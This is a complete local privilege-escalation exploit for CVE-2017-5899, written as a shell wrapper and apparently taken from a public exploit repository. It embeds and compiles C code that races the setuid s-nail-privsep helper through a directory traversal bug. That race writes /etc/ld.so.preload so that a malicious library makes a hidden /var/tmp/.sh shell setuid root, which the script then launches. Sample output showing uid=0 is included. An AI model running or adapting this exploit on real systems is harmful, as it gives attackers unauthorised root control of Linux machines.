360 lines
No EOL
8.3 KiB
Bash
Executable file
360 lines
No EOL
8.3 KiB
Bash
Executable file
#!/bin/sh
|
|
# Wrapper for @wapiflapi's s-nail-privget.c local root exploit for CVE-2017-5899
|
|
# uses ld.so.preload technique
|
|
# ---
|
|
# [~] Found privsep: /usr/lib/s-nail/s-nail-privsep
|
|
# [.] Compiling /var/tmp/.snail.so.c ...
|
|
# [.] Compiling /var/tmp/.sh.c ...
|
|
# [.] Compiling /var/tmp/.privget.c ...
|
|
# [.] Adding /var/tmp/.snail.so to /etc/ld.so.preload ...
|
|
# [=] s-nail-privsep local root by @wapiflapi
|
|
# [.] Started flood in /etc/ld.so.preload
|
|
# [.] Started race with /usr/lib/s-nail/s-nail-privsep
|
|
# [.] This could take a while...
|
|
# [.] Race #1 of 1000 ...
|
|
# This is a helper program of "s-nail" (in /usr/bin).
|
|
# It is capable of gaining more privileges than "s-nail"
|
|
# and will be used to create lock files.
|
|
# It's sole purpose is outsourcing of high privileges into
|
|
# fewest lines of code in order to reduce attack surface.
|
|
# It cannot be run by itself.
|
|
# [.] Race #2 of 1000 ...
|
|
# ...
|
|
# ...
|
|
# ...
|
|
# [.] Race #9 of 1000 ...
|
|
# [+] got root! /var/tmp/.sh (uid=0 gid=0)
|
|
# [.] Cleaning up...
|
|
# [+] Success:
|
|
# -rwsr-xr-x 1 root root 6336 Jan 13 20:42 /var/tmp/.sh
|
|
# [.] Launching root shell: /var/tmp/.sh
|
|
# # id
|
|
# uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare),1000(test)
|
|
# ---
|
|
# <bcoles@gmail.com>
|
|
# https://github.com/bcoles/local-exploits/tree/master/CVE-2017-5899
|
|
|
|
base_dir="/var/tmp"
|
|
rootshell="${base_dir}/.sh"
|
|
privget="${base_dir}/.privget"
|
|
lib="${base_dir}/.snail.so"
|
|
|
|
if test -u "${1}"; then
|
|
privsep_path="${1}"
|
|
elif test -u /usr/lib/s-nail/s-nail-privsep; then
|
|
privsep_path="/usr/lib/s-nail/s-nail-privsep"
|
|
elif test -u /usr/lib/mail-privsep; then
|
|
privsep_path="/usr/lib/mail-privsep"
|
|
else
|
|
echo "[-] Could not find privsep path"
|
|
exit 1
|
|
fi
|
|
echo "[~] Found privsep: ${privsep_path}"
|
|
|
|
if ! test -w "${base_dir}"; then
|
|
echo "[-] ${base_dir} is not writable"
|
|
exit 1
|
|
fi
|
|
|
|
echo "[.] Compiling ${lib}.c ..."
|
|
|
|
cat << EOF > "${lib}.c"
|
|
#include <stdlib.h>
|
|
#include <stdio.h>
|
|
#include <sys/stat.h>
|
|
#include <unistd.h>
|
|
|
|
void init(void) __attribute__((constructor));
|
|
|
|
void __attribute__((constructor)) init() {
|
|
if (setuid(0) || setgid(0))
|
|
_exit(1);
|
|
|
|
unlink("/etc/ld.so.preload");
|
|
|
|
chown("${rootshell}", 0, 0);
|
|
chmod("${rootshell}", 04755);
|
|
_exit(0);
|
|
}
|
|
EOF
|
|
|
|
if ! gcc "${lib}.c" -fPIC -Wall -shared -s -o "${lib}"; then
|
|
echo "[-] Compiling ${lib}.c failed"
|
|
exit 1
|
|
fi
|
|
|
|
/bin/rm "${lib}.c"
|
|
|
|
echo "[.] Compiling ${rootshell}.c ..."
|
|
|
|
cat << EOF > "${rootshell}.c"
|
|
#include <stdio.h>
|
|
#include <sys/types.h>
|
|
#include <unistd.h>
|
|
int main(void)
|
|
{
|
|
setuid(0);
|
|
setgid(0);
|
|
execl("/bin/sh", "sh", NULL);
|
|
}
|
|
EOF
|
|
|
|
if ! gcc "${rootshell}.c" -fPIC -Wall -s -o "${rootshell}"; then
|
|
echo "[-] Compiling ${rootshell}.c failed"
|
|
exit 1
|
|
fi
|
|
|
|
/bin/rm "${rootshell}.c"
|
|
|
|
cat << EOF > "${privget}.c"
|
|
/*
|
|
** 26/01/2016: s-nail-privsep local root by @wapiflapi
|
|
** The setuid s-nail-privsep binary has a directory traversal bug.
|
|
** This lets us be owner of a file at any location root can give us one,
|
|
** only for a very short time though. So we have to race a bit :-)
|
|
** Here we abuse the vuln by creating a polkit policy letting us call pkexec su.
|
|
**
|
|
** gcc s-nail-privget.c -o s-nail-privget
|
|
**
|
|
** # for ubuntu:
|
|
** ./s-nail-privget /usr/lib/s-nail/s-nail-privsep
|
|
** # for archlinux:
|
|
** ./s-nail-privget /usr/lib/mail-privsep
|
|
** ---
|
|
** Original exploit: https://www.openwall.com/lists/oss-security/2017/01/27/7/1
|
|
** Updated by <bcoles@gmail.com> to use ldpreload technique
|
|
** https://github.com/bcoles/local-exploits/tree/master/CVE-2017-5899
|
|
*/
|
|
|
|
#define _GNU_SOURCE
|
|
|
|
#include <unistd.h>
|
|
#include <stdlib.h>
|
|
#include <string.h>
|
|
#include <stdio.h>
|
|
#include <fcntl.h>
|
|
|
|
#include <sys/types.h>
|
|
#include <sys/stat.h>
|
|
#include <sys/wait.h>
|
|
|
|
#define DEBUG
|
|
|
|
#ifdef DEBUG
|
|
# define dprintf printf
|
|
#else
|
|
# define dprintf
|
|
#endif
|
|
|
|
#define ROOTSHELL "${rootshell}"
|
|
#define ITERATIONS 1000
|
|
|
|
/*
|
|
** Attempts to copy data to target quickly...
|
|
*/
|
|
static pid_t flood(char const *target, char const *data, size_t len) {
|
|
pid_t child;
|
|
|
|
if ((child = fork()) != 0)
|
|
return child;
|
|
|
|
if (nice(-20) < 0) {
|
|
dprintf("[!] Failed to set niceness");
|
|
}
|
|
|
|
while (1) {
|
|
int fd;
|
|
|
|
if ((fd = open(target, O_WRONLY)) < 0) {
|
|
continue;
|
|
}
|
|
|
|
write(fd, data, len);
|
|
close(fd);
|
|
|
|
usleep(10);
|
|
}
|
|
|
|
return child;
|
|
}
|
|
|
|
/*
|
|
** This triggers the vulnerability. (a lot.)
|
|
*/
|
|
static pid_t race(char const *path, char const *target) {
|
|
pid_t child;
|
|
|
|
if ((child = fork()) != 0)
|
|
return child;
|
|
|
|
char *argv[] = {
|
|
NULL, "rdotlock",
|
|
"mailbox", NULL, // \$TMPDIR/foo
|
|
"name", NULL, // \$TMPDIR/foo.lock
|
|
"hostname", "spam",
|
|
"randstr", NULL, // eggs/../../../../../../..\$TARGET
|
|
"pollmsecs","0",
|
|
NULL
|
|
};
|
|
|
|
char tmpdir[] = "/tmp/tmpdir.XXXXXX";
|
|
char *loldir;
|
|
|
|
int fd, pid, inpipe[2], outpipe[2];
|
|
|
|
if (!mkdtemp(tmpdir)) {
|
|
dprintf("[-] mkdtemp(%s)", tmpdir);
|
|
exit(EXIT_FAILURE);
|
|
}
|
|
|
|
if (!(argv[0] = strrchr(path, '/'))) {
|
|
dprintf("[-] %s is not full path to privsep.", path);
|
|
exit(EXIT_FAILURE);
|
|
}
|
|
argv[0] += 1; // skip '/'.
|
|
|
|
// (nope I'm not going to free those later.)
|
|
if (asprintf(&loldir, "%s/foo.lock.spam.eggs", tmpdir) < 0 ||
|
|
asprintf(&argv[3], "%s/foo", tmpdir) < 0 ||
|
|
asprintf(&argv[5], "%s/foo.lock", tmpdir) < 0 ||
|
|
asprintf(&argv[9], "eggs/../../../../../../..%s", target) < 0) {
|
|
dprintf("[-] asprintf() failed\n");
|
|
exit(EXIT_FAILURE);
|
|
}
|
|
|
|
// touch \$tmpdir/foo
|
|
if ((fd = open(argv[3], O_WRONLY | O_CREAT, 0640)) < 0) {
|
|
dprintf("[-] open(%s) failed\n", argv[3]);
|
|
exit(EXIT_FAILURE);
|
|
}
|
|
close(fd);
|
|
|
|
// mkdir \$tmpdir/foo.lock.spam.eggs
|
|
if (mkdir(loldir, 0755) < 0) {
|
|
dprintf("[-] mkdir(%s) failed\n", loldir);
|
|
exit(EXIT_FAILURE);
|
|
}
|
|
|
|
// OK, done setting up the environment & args.
|
|
// Setup some pipes and let's get going.
|
|
if (pipe(inpipe) < 0 || pipe(outpipe) < 0) {
|
|
dprintf("[-] pipe() failed\n");
|
|
exit(EXIT_FAILURE);
|
|
}
|
|
|
|
close(inpipe[1]);
|
|
close(outpipe[0]);
|
|
|
|
while (1) {
|
|
if ((pid = fork()) < 0) {
|
|
dprintf("[!] fork failed\n");
|
|
continue;
|
|
} else if (pid) {
|
|
waitpid(pid, NULL, 0);
|
|
continue;
|
|
}
|
|
|
|
// This is the child, give it the pipes it wants. (-_-')
|
|
if (dup2(inpipe[0], 0) < 0 || dup2(outpipe[1], 1) < 0) {
|
|
dprintf("[-] dup2() failed\n");
|
|
exit(EXIT_FAILURE);
|
|
}
|
|
|
|
if (nice(20) < 0) {
|
|
dprintf("[!] Failed to set niceness");
|
|
}
|
|
|
|
execv(path, argv);
|
|
dprintf("[-] execve(%s) failed\n", path);
|
|
exit(EXIT_FAILURE);
|
|
}
|
|
|
|
return child;
|
|
}
|
|
|
|
int main(int argc, char **argv, char **envv) {
|
|
char payload[] = "${lib}";
|
|
char const *target = "/etc/ld.so.preload";
|
|
char const *privsep_path = argv[1];
|
|
pid_t flood_pid, race_pid;
|
|
struct stat st;
|
|
|
|
if (argc != 2) {
|
|
dprintf("usage: %s /full/path/to/privsep\n", argv[0]);
|
|
exit(EXIT_FAILURE);
|
|
}
|
|
|
|
lstat(privsep_path, &st);
|
|
|
|
if ((long)st.st_uid != 0) {
|
|
dprintf("[-] privsep path is not valid: %s\n", privsep_path);
|
|
exit(EXIT_FAILURE);
|
|
}
|
|
|
|
dprintf("[=] s-nail-privsep local root by @wapiflapi\n");
|
|
|
|
if ((flood_pid = flood(target, payload, sizeof payload)) == -1) {
|
|
dprintf("[-] flood() failed\n");
|
|
exit(EXIT_FAILURE);
|
|
}
|
|
|
|
dprintf("[.] Started flood in %s\n", target);
|
|
|
|
if ((race_pid = race(privsep_path, target)) == -1) {
|
|
dprintf("[-] race() failed\n");
|
|
exit(EXIT_FAILURE);
|
|
}
|
|
|
|
dprintf("[.] Started race with %s\n", privsep_path);
|
|
dprintf("[.] This could take a while...\n");
|
|
|
|
for (int i = 1; i <= ITERATIONS; i++) {
|
|
dprintf("[.] Race #%d of %d ...\n", i, ITERATIONS);
|
|
system(privsep_path);
|
|
lstat(ROOTSHELL, &st);
|
|
if ((long)st.st_uid == 0)
|
|
break;
|
|
}
|
|
|
|
kill(race_pid, SIGKILL);
|
|
kill(flood_pid, SIGKILL);
|
|
|
|
if ((long)st.st_uid != 0) {
|
|
dprintf("[-] Failed. Not vulnerable?\n");
|
|
exit(EXIT_FAILURE);
|
|
}
|
|
dprintf("[+] got root! %s (uid=%ld gid=%ld)\n", ROOTSHELL, (long)st.st_uid, (long)st.st_gid);
|
|
|
|
return system(ROOTSHELL);
|
|
}
|
|
EOF
|
|
|
|
echo "[.] Compiling ${privget}.c ..."
|
|
|
|
if ! gcc "${privget}.c" -fPIC -Wall -s -o "${privget}"; then
|
|
echo "[-] Compiling ${privget}.c failed"
|
|
exit 1
|
|
fi
|
|
|
|
/bin/rm "${privget}.c"
|
|
|
|
echo "[.] Adding ${lib} to /etc/ld.so.preload ..."
|
|
|
|
echo | $privget "${privsep_path}"
|
|
|
|
echo '[.] Cleaning up...'
|
|
|
|
/bin/rm "${privget}"
|
|
/bin/rm "${lib}"
|
|
|
|
if ! test -u "${rootshell}"; then
|
|
echo '[-] Failed'
|
|
/bin/rm "${rootshell}"
|
|
exit 1
|
|
fi
|
|
|
|
echo '[+] Success:'
|
|
/bin/ls -la "${rootshell}"
|
|
|
|
echo "[.] Launching root shell: ${rootshell}"
|
|
$rootshell |